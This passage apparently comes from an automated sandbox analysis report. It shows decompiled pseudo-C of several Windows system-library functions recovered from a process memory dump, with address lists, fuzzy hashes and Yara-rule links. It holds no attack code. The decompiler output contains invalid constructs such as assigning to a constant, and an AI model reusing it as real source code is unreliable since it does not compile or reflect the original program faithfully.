									if( *(_t237 - 0x6c) != 0) {
										L047F77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x48c7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x48c7b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E048137C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x48c7b9c; // 0x0
									_t214 = L047F4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E048137F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x48c7b10 =  *0x48c7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x48c7b04 =  *0x48c7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L047F77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L047F77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x48c7b08 =  *0x48c7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E048157C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0481F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L047F77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0480A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L047F77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E048196C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                        0x047e849b
                                                        0x047e849b
                                                        0x047e849b
                                                        0x047e849b
                                                        0x047e849d
                                                        0x047e84a2
                                                        0x047e84a7
                                                        0x047e84b1
                                                        0x047e84d8
                                                        0x00000000
                                                        0x047e84b3
                                                        0x047e84c4
                                                        0x047e84c9
                                                        0x047e84cd
                                                        0x047e84cf
                                                        0x047e84cf
                                                        0x047e84d6
                                                        0x047e84e6
                                                        0x047e84e9
                                                        0x047e84ec
                                                        0x047e84ef
                                                        0x047e84f2
                                                        0x047e84f4
                                                        0x047e84fc
                                                        0x047e8501
                                                        0x047e8506
                                                        0x047e8509
                                                        0x047e86e0
                                                        0x047e86e5
                                                        0x047e86e8
                                                        0x047e86ed
                                                        0x047e86f0
                                                        0x047e86f2
                                                        0x04839afd
                                                        0x04839b02
                                                        0x047e84da
                                                        0x047e84df
                                                        0x047e84df
                                                        0x047e86fa
                                                        0x047e86fd
                                                        0x047e86fe
                                                        0x047e8701
                                                        0x047e8706
                                                        0x047e8709
                                                        0x047e870b
                                                        0x00000000
                                                        0x00000000
                                                        0x047e8711
                                                        0x047e8725
                                                        0x047e8727
                                                        0x047e872a
                                                        0x047e872c
                                                        0x04839af0
                                                        0x04839af5
                                                        0x047e8732
                                                        0x047e8732
                                                        0x047e8732
                                                        0x047e8735
                                                        0x047e8737
                                                        0x047e8515
                                                        0x047e8515
                                                        0x047e8518
                                                        0x047e851d
                                                        0x047e8523
                                                        0x047e8527
                                                        0x047e852b
                                                        0x047e8537
                                                        0x047e8539
                                                        0x047e853c
                                                        0x047e853e
                                                        0x047e868c
                                                        0x047e8691
                                                        0x047e8699
                                                        0x047e869b
                                                        0x047e8744
                                                        0x047e8748
                                                        0x047e86a1
                                                        0x047e86a1
                                                        0x047e86a1
                                                        0x047e86a4
                                                        0x047e86a8
                                                        0x04839bdf
                                                        0x04839bdf
                                                        0x047e86ae
                                                        0x047e86b0
                                                        0x00000000
                                                        0x047e86b6
                                                        0x00000000
                                                        0x04839be9
                                                        0x047e86b0
                                                        0x047e8544
                                                        0x047e854a
                                                        0x047e854d
                                                        0x047e8551
                                                        0x047e876e
                                                        0x047e8778
                                                        0x047e877b
                                                        0x047e8780
                                                        0x047e8557
                                                        0x047e8557
                                                        0x047e855d
                                                        0x047e855d
                                                        0x047e856b
                                                        0x047e856e
                                                        0x047e8570
                                                        0x047e8573
                                                        0x047e8576
                                                        0x047e8576
                                                        0x047e8579
                                                        0x047e857b
                                                        0x00000000
                                                        0x00000000
                                                        0x047e8581
                                                        0x047e85a0
                                                        0x047e85a2
                                                        0x047e85a5
                                                        0x047e85a7
                                                        0x04839b1b
                                                        0x04839b1b
                                                        0x047e862e
                                                        0x047e862e
                                                        0x047e8631
                                                        0x047e8631
                                                        0x047e8634
                                                        0x047e8636
                                                        0x047e8669
                                                        0x047e8669
                                                        0x047e866b
                                                        0x04839bbf
                                                        0x04839bc4
                                                        0x04839bc8
                                                        0x04839bce
                                                        0x04839bce
                                                        0x047e8671
                                                        0x047e8671
                                                        0x047e8674
                                                        0x047e8676
                                                        0x04839bae
                                                        0x04839bae
                                                        0x047e8676
                                                        0x047e867c
                                                        0x047e867e
                                                        0x047e8688
                                                        0x047e8688
                                                        0x00000000
                                                        0x047e867e
                                                        0x047e8638
                                                        0x047e8638
                                                        0x047e863b
                                                        0x047e863e
                                                        0x047e863f
                                                        0x047e8642
                                                        0x047e8645
                                                        0x047e8648
                                                        0x047e864d
                                                        0x04839b69
                                                        0x04839b6e
                                                        0x04839b7b
                                                        0x04839b81
                                                        0x04839b85
                                                        0x04839b89
                                                        0x04839ba7
                                                        0x04839b8b
                                                        0x04839b91
                                                        0x04839b9a
                                                        0x04839b9f
                                                        0x04839b9f
                                                        0x047e8788
                                                        0x047e878d
                                                        0x047e8763
                                                        0x047e8763
                                                        0x047e8766
                                                        0x00000000
                                                        0x047e8766
                                                        0x04839b70
                                                        0x00000000
                                                        0x04839b70
                                                        0x047e8656
                                                        0x047e865a
                                                        0x047e865c
                                                        0x047e8752
                                                        0x047e8756
                                                        0x00000000
                                                        0x00000000
                                                        0x047e875e
                                                        0x00000000
                                                        0x047e875e
                                                        0x047e8662
                                                        0x047e8662
                                                        0x047e8662
                                                        0x047e8666
                                                        0x00000000
                                                        0x047e8666
                                                        0x047e85b7
                                                        0x047e85b9
                                                        0x047e85bc
                                                        0x047e85bf
                                                        0x047e85cc
                                                        0x047e85d1
                                                        0x047e85d4
                                                        0x047e85db
                                                        0x047e85de
                                                        0x047e85e0
                                                        0x04839b5f
                                                        0x00000000
                                                        0x04839b5f
                                                        0x047e85e6
                                                        0x047e85ea
                                                        0x047e86c3
                                                        0x047e86c5
                                                        0x047e86c8
                                                        0x047e86ca
                                                        0x04839b16
                                                        0x00000000
                                                        0x04839b16
                                                        0x047e86d6
                                                        0x047e85f6
                                                        0x047e85f6
                                                        0x047e85f9
                                                        0x047e8602
                                                        0x047e8606
                                                        0x047e860a
                                                        0x047e860b
                                                        0x047e860e
                                                        0x047e8611
                                                        0x00000000
                                                        0x047e8611
                                                        0x047e85f3
                                                        0x00000000
                                                        0x047e85f3
                                                        0x047e8619
                                                        0x047e861e
                                                        0x047e861e
                                                        0x047e8621
                                                        0x047e8622
                                                        0x047e8623
                                                        0x047e8625
                                                        0x047e862c
                                                        0x00000000
                                                        0x047e873d
                                                        0x00000000
                                                        0x047e873d
                                                        0x047e8737
                                                        0x047e850f
                                                        0x047e8512
                                                        0x00000000
                                                        0x047e8512
                                                        0x00000000
                                                        0x047e84d6

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cf2eafdc53b07b151521700d01f6229e7b7d13b931e73ae90946968535feb069
                                                        • Instruction ID: 0040735b786a07b50b16e8d3138b3d98671c7f809a831667ac76d0d17b05c8fe
                                                        • Opcode Fuzzy Hash: cf2eafdc53b07b151521700d01f6229e7b7d13b931e73ae90946968535feb069
                                                        • Instruction Fuzzy Hash: EBB13BB0E00219DFDB14EF9AC984AADBBB9FF48304F114A2AE515AB341D774B941CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0480513A, Relevance: .3, Instructions: 258COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 67%
                                                        			E0480513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x48cd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0481D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E047F2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L047F4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0481F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E047EFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x48cb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0481B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                        0x04805142
                                                        0x0480514c
                                                        0x04805150
                                                        0x04805157
                                                        0x04805159
                                                        0x0480515e
                                                        0x04805165
                                                        0x04805169
                                                        0x0480516c
                                                        0x04805172
                                                        0x04805176
                                                        0x0480517a
                                                        0x0480517a
                                                        0x0480517a
                                                        0x0480517f
                                                        0x04846d8b
                                                        0x04846d8e
                                                        0x04846d91
                                                        0x04846d95
                                                        0x04846d98
                                                        0x04846d9c
                                                        0x04846da0
                                                        0x04846da3
                                                        0x04846da7
                                                        0x04846e26
                                                        0x04846e26
                                                        0x04846e2a
                                                        0x048051f9
                                                        0x048051f9
                                                        0x048051fe
                                                        0x04846e33
                                                        0x04846e33
                                                        0x04846e39
                                                        0x04846e3d
                                                        0x04846e46
                                                        0x04846e50
                                                        0x00000000
                                                        0x00000000
                                                        0x04846e52
                                                        0x04846e53
                                                        0x04846e56
                                                        0x04846e5d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04846e5f
                                                        0x04846e67
                                                        0x04846e77
                                                        0x04846e7f
                                                        0x04846e80
                                                        0x04846e88
                                                        0x04846e90
                                                        0x04846e9f
                                                        0x04846ea5
                                                        0x04846ea9
                                                        0x04846eb1
                                                        0x04846ebf
                                                        0x00000000
                                                        0x00000000
                                                        0x04846ecf
                                                        0x04846ed3
                                                        0x00000000
                                                        0x00000000
                                                        0x04846edb
                                                        0x04846ede
                                                        0x04846ee1
                                                        0x04846ee8
                                                        0x04846eeb
                                                        0x04846eed
                                                        0x04846ef0
                                                        0x04846ef4
                                                        0x04846ef8
                                                        0x04846efc
                                                        0x00000000
                                                        0x00000000
                                                        0x04846f0d
                                                        0x04846f11
                                                        0x04846f32
                                                        0x04846f37
                                                        0x04846f3b
                                                        0x04846f3e
                                                        0x04846f41
                                                        0x04846f46
                                                        0x00000000
                                                        0x00000000
                                                        0x04846f4c
                                                        0x04846f50
                                                        0x04846f50
                                                        0x04846f54
                                                        0x04846f62
                                                        0x04846f65
                                                        0x04846f6d
                                                        0x04846f7b
                                                        0x04846f7b
                                                        0x04846f93
                                                        0x04846f98
                                                        0x04846fa0
                                                        0x04846fa6
                                                        0x04846fb3
                                                        0x04846fb6
                                                        0x04846fbf
                                                        0x04846fc1
                                                        0x04846fd5
                                                        0x04846fda
                                                        0x04846fda
                                                        0x04846fdd
                                                        0x04846fe2
                                                        0x04846fe7
                                                        0x04846feb
                                                        0x04846fef
                                                        0x04846ff3
                                                        0x0480520c
                                                        0x0480520c
                                                        0x0480520f
                                                        0x04805215
                                                        0x04805234
                                                        0x0480523a
                                                        0x0480523a
                                                        0x04805244
                                                        0x04805245
                                                        0x04805246
                                                        0x04805251
                                                        0x04805251
                                                        0x04846f13
                                                        0x04846f17
                                                        0x04846f17
                                                        0x04846f18
                                                        0x04846f1b
                                                        0x04846f1f
                                                        0x04846f23
                                                        0x00000000
                                                        0x04846f28
                                                        0x04805204
                                                        0x04805204
                                                        0x04805208
                                                        0x00000000
                                                        0x04805208
                                                        0x04805185
                                                        0x04805188
                                                        0x0480518a
                                                        0x0480518e
                                                        0x04805195
                                                        0x04846db1
                                                        0x04846db5
                                                        0x04846db9
                                                        0x0480519b
                                                        0x0480519b
                                                        0x0480519e
                                                        0x048051a7
                                                        0x048051a9
                                                        0x048051a9
                                                        0x048051b5
                                                        0x048051b8
                                                        0x048051bb
                                                        0x048051be
                                                        0x048051c1
                                                        0x048051c5
                                                        0x048051c9
                                                        0x048051cd
                                                        0x048051cd
                                                        0x048051d8
                                                        0x048051dc
                                                        0x048051e0
                                                        0x04846dcc
                                                        0x04846dd0
                                                        0x04846dd5
                                                        0x04846ddd
                                                        0x04846de1
                                                        0x04846de1
                                                        0x04846de5
                                                        0x04846deb
                                                        0x04846df1
                                                        0x04846df7
                                                        0x04846dfd
                                                        0x04846e01
                                                        0x04846e05
                                                        0x04846e09
                                                        0x04846e0d
                                                        0x04846e11
                                                        0x04846e11
                                                        0x048051eb
                                                        0x04846e1a
                                                        0x04846e1f
                                                        0x04846e21
                                                        0x04846e23
                                                        0x00000000
                                                        0x048051f1
                                                        0x048051f1
                                                        0x00000000
                                                        0x048051f1

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2ed33cf0dcd3a6da6c7417a6a713e80429425666fbf705cb4921ba2251b2e75b
                                                        • Instruction ID: 6a8ec52dbb2efb6a264ee166e1895733a3618f732b224818d9b57ec6a86d44ed
                                                        • Opcode Fuzzy Hash: 2ed33cf0dcd3a6da6c7417a6a713e80429425666fbf705cb4921ba2251b2e75b
                                                        • Instruction Fuzzy Hash: 53C133755083809FD354CF28C480A5AFBE1BF89308F148A6EF8999B392D375E945CF52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048003E2, Relevance: .3, Instructions: 254COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 74%
                                                        			E048003E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x48cd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E04800548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0481B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E047EB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x48c7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E047F7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E047F7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E04857016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E04819830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E048569A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x48c7c04 != 0) {
						_t118 = _v12;
						_t120 = E0485A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x48c7bd8;
						if( *0x48c7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E048195D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E048199A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E04853540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E047DB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0481AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x48c8474 - 3;
										if( *0x48c8474 != 3) {
											 *0x48c79dc =  *0x48c79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E047F7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
